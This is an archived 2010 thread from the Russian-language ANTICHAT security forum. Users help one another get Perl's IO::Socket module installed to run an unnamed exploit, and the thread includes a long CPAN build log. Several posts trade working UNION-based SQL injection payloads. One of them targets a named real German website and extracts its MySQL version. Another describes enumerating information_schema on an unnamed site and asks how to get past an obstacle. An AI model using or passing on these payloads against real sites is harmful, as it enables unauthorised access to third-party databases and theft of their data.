ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.07.2010, 18:42
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
|
|
|
08.07.2010, 19:06
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
А где перл обычно лежит? Убунта)
|
|
|
|
08.07.2010, 19:16
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от Boa
Boa said:
А где перл обычно лежит? Убунта)
тогда кидай модуль в один из этих путей в папку IO
/etc/perl
/usr/local/lib/perl/5.10.1
/usr/local/share/perl/5.10.1
/usr/lib/perl5
/usr/share/perl5
/usr/lib/perl/5.10
/usr/share/perl/5.10
|
|
|
|
09.07.2010, 11:49
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
Гм, в /etc/perl/IO положил Socket.pm, но ошибка все равно такая. Или надо класть во все каталоги?
|
|
|
|
09.07.2010, 12:05
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
Boa в терминале выполни:
sudo perl -MCPAN -e shell
install IO:Socket
|
|
|
|
09.07.2010, 12:38
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
почему этого сайта не показывай номер?
http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25--&service_menu=Termine
Я попытаться изменить --,/*, предела, name_const, но не результат?
|
|
|
|
09.07.2010, 12:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от haito
haito said:
почему этого сайта не показывай номер?
http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25--&service_menu=Termine
Я попытаться изменить --,/*, предела, name_const, но не результат?
http://www.nrhz.de/flyer/beitrag.php?id=15330+and+1=0+union+select+1,2,3,4, 5,6,7,8,9,aes_decrypt(aes_encrypt(version(),1),1), 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
Column 10
|
|
|
|
09.07.2010, 13:43
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
daniel_1024 гм, набрал, вот такие ужасы:
Код:
Code:
yaroslav@yaroslav-desktop:~$ sudo perl -MCPAN -e shell
Terminal does not support AddHistory.
cpan shell -- CPAN exploration and modules installation (v1.9402)
Enter 'h' for help.
cpan[1]> h
Display Information (ver 1.9402)
command argument description
a,b,d,m WORD or /REGEXP/ about authors, bundles, distributions, modules
i WORD or /REGEXP/ about any of the above
ls AUTHOR or GLOB about files in the author's directory
(with WORD being a module, bundle or author name or a distribution
name of the form AUTHOR/DISTRIBUTION)
Download, Test, Make, Install...
get download clean make clean
make make (implies get) look open subshell in dist directory
test make test (implies make) readme display these README files
install make install (implies test) perldoc display POD documentation
Upgrade
r WORDs or /REGEXP/ or NONE report updates for some/matching/all modules
upgrade WORDs or /REGEXP/ or NONE upgrade some/matching/all modules
Pragmas
force CMD try hard to do command fforce CMD try harder
notest CMD skip testing
Other
h,? display this menu ! perl-code eval a perl command
o conf [opt] set and query options q quit the cpan shell
reload cpan load CPAN.pm again reload index load newer indices
autobundle Snapshot recent latest CPAN uploads
cpan[2]> install IO:Socket
CPAN: Storable loaded ok (v2.20)
Going to read '/home/yaroslav/.cpan/Metadata'
Database was generated on Fri, 09 Jul 2010 06:27:12 GMT
Running install for module 'IO::Socket'
CPAN: Data::Dumper loaded ok (v2.124)
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/home/yaroslav/.cpan/prefs'
Running make for G/GB/GBARR/IO-1.25.tar.gz
CPAN: Digest::SHA loaded ok (v5.47)
CPAN: Compress::Zlib loaded ok (v2.02)
Checksum for /home/yaroslav/.cpan/sources/authors/id/G/GB/GBARR/IO-1.25.tar.gz ok
Scanning cache /home/yaroslav/.cpan/build for sizes
............................................................................DONE
CPAN: Archive::Tar loaded ok (v1.52)
IO-1.25/
IO-1.25/ChangeLog
IO-1.25/IO.pm
IO-1.25/IO.xs
IO-1.25/lib/
IO-1.25/lib/IO/
IO-1.25/lib/IO/Dir.pm
IO-1.25/lib/IO/File.pm
IO-1.25/lib/IO/Handle.pm
IO-1.25/lib/IO/Pipe.pm
IO-1.25/lib/IO/Poll.pm
IO-1.25/lib/IO/Seekable.pm
IO-1.25/lib/IO/Select.pm
IO-1.25/lib/IO/Socket/
IO-1.25/lib/IO/Socket/INET.pm
IO-1.25/lib/IO/Socket/UNIX.pm
IO-1.25/lib/IO/Socket.pm
IO-1.25/Makefile.PL
IO-1.25/MANIFEST
IO-1.25/META.yml
IO-1.25/poll.c
IO-1.25/poll.h
IO-1.25/README
IO-1.25/SIGNATURE
IO-1.25/t/
IO-1.25/t/IO.t
IO-1.25/t/io_const.t
IO-1.25/t/io_dir.t
IO-1.25/t/io_dup.t
IO-1.25/t/io_file.t
IO-1.25/t/io_linenum.t
IO-1.25/t/io_multihomed.t
IO-1.25/t/io_pipe.t
IO-1.25/t/io_poll.t
IO-1.25/t/io_sel.t
IO-1.25/t/io_sock.t
IO-1.25/t/io_taint.t
IO-1.25/t/io_tell.t
IO-1.25/t/io_udp.t
IO-1.25/t/io_unix.t
IO-1.25/t/io_utf8.t
IO-1.25/t/io_xs.t
IO-1.25/t/test.pl
CPAN: File::Temp loaded ok (v0.22)
CPAN.pm: Going to build G/GB/GBARR/IO-1.25.tar.gz
Checking if your kit is complete...
Looks good
Writing Makefile for IO
Could not read '/home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/META.yml'. Falling back to other methods to determine prerequisites
cp lib/IO/Pipe.pm blib/lib/IO/Pipe.pm
cp lib/IO/File.pm blib/lib/IO/File.pm
cp lib/IO/Select.pm blib/lib/IO/Select.pm
cp lib/IO/Socket/INET.pm blib/lib/IO/Socket/INET.pm
cp lib/IO/Socket.pm blib/lib/IO/Socket.pm
cp lib/IO/Socket/UNIX.pm blib/lib/IO/Socket/UNIX.pm
cp lib/IO/Poll.pm blib/lib/IO/Poll.pm
cp lib/IO/Handle.pm blib/lib/IO/Handle.pm
cp lib/IO/Dir.pm blib/lib/IO/Dir.pm
cp lib/IO/Seekable.pm blib/lib/IO/Seekable.pm
cp IO.pm blib/lib/IO.pm
/usr/bin/perl /usr/share/perl/5.10/ExtUtils/xsubpp -typemap /usr/share/perl/5.10/ExtUtils/typemap IO.xs > IO.xsc && mv IO.xsc IO.c
cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" IO.c
cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" poll.c
Running Mkbootstrap for IO ()
chmod 644 IO.bs
rm -f blib/arch/auto/IO/IO.so
cc -shared -O2 -g -L/usr/local/lib -fstack-protector IO.o poll.o -o blib/arch/auto/IO/IO.so \
\
chmod 755 blib/arch/auto/IO/IO.so
cp IO.bs blib/arch/auto/IO/IO.bs
chmod 644 blib/arch/auto/IO/IO.bs
Manifying blib/man3/IO::Pipe.3pm
Manifying blib/man3/IO::File.3pm
Manifying blib/man3/IO::Select.3pm
Manifying blib/man3/IO::Socket::INET.3pm
Manifying blib/man3/IO::Socket.3pm
Manifying blib/man3/IO::Socket::UNIX.3pm
Manifying blib/man3/IO::Poll.3pm
Manifying blib/man3/IO::Handle.3pm
Manifying blib/man3/IO::Dir.3pm
Manifying blib/man3/IO::Seekable.3pm
Manifying blib/man3/IO.3pm
GBARR/IO-1.25.tar.gz
/usr/bin/make -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
Running make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0, 'blib/lib', 'blib/arch')" t/*.t
t/IO.t ............. ok
t/io_const.t ....... ok
t/io_dir.t ......... ok
t/io_dup.t ......... ok
t/io_file.t ........ ok
t/io_linenum.t ..... ok
t/io_multihomed.t .. ok
t/io_pipe.t ........ ok
t/io_poll.t ........ ok
t/io_sel.t ......... ok
t/io_sock.t ........ ok
t/io_taint.t ....... ok
t/io_tell.t ........ ok
t/io_udp.t ......... ok
t/io_unix.t ........ ok
t/io_utf8.t ........ ok
t/io_xs.t .......... ok
All tests successful.
Files=17, Tests=180, 22 wallclock secs ( 0.06 usr 0.02 sys + 0.40 cusr 0.09 csys = 0.57 CPU)
Result: PASS
GBARR/IO-1.25.tar.gz
/usr/bin/make test -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
Running make install
Prepending /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/arch /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/lib to PERL5LIB for 'install'
Files found in blib/arch: installing files in blib/lib into architecture dependent library tree
Installing /usr/local/lib/perl/5.10.1/auto/IO/IO.so
Appending installation info to /usr/local/lib/perl/5.10.1/perllocal.pod
GBARR/IO-1.25.tar.gz
/usr/bin/make install -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
cpan[3]>
Сплоит использовать по прежнему не получается( |
|
|
|
09.07.2010, 15:20
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773
Репутация:
1
|
|
Всем привет!
Обнаружилась на одном ресурсе уязвимость. Проведя SQL injection удалось с помощью функций MySQL user() и database() узнать, соответственно, имя пользователя и базы в СУБД:
Код:
Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,user(),3,4,5+--+
Код:
Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,database(),3,4,5+--+
Далее, используя переведенное в hex полученное имя БД, я предпринял попытку выудить имена таблиц запросом к INFORMATION_SCHEMA:
Код:
Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,table_name,3,4,5+from+information_schema.tables+where+table_schema=0x643630363138313039+--+
Ничто не предвещало сложностей, но результат я так и не получил. Любые запросы к базе с метаданными сопровождаются непонятной длительной загрузкой данных с сервера и успешной (код 200) выдачей пустой HTML-страницы.
Доступ к INFORMATION_SCHEMA есть - отработал запрос
Код:
Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GRANTEE,3,4,5+FROM+INFORMATION_SC HEMA.USER_PRIVILEGES+--+[/u]
и выдал мне идентификатор пользователя.
Пробовал указывать LIMIT 1 - результат тот же.
Кстати, хотел посмотреть COUNT(*) - то же самое.
Версия MySQL-сервера 5.0.77-log.
Кто сталкивался с подобным? Какие будут советы? Рекомендации?
Спасибо за любые подсказки! |
|
|
|
09.07.2010, 15:25
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Decoy
без линка вряд ли cмогут помочь тебя
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
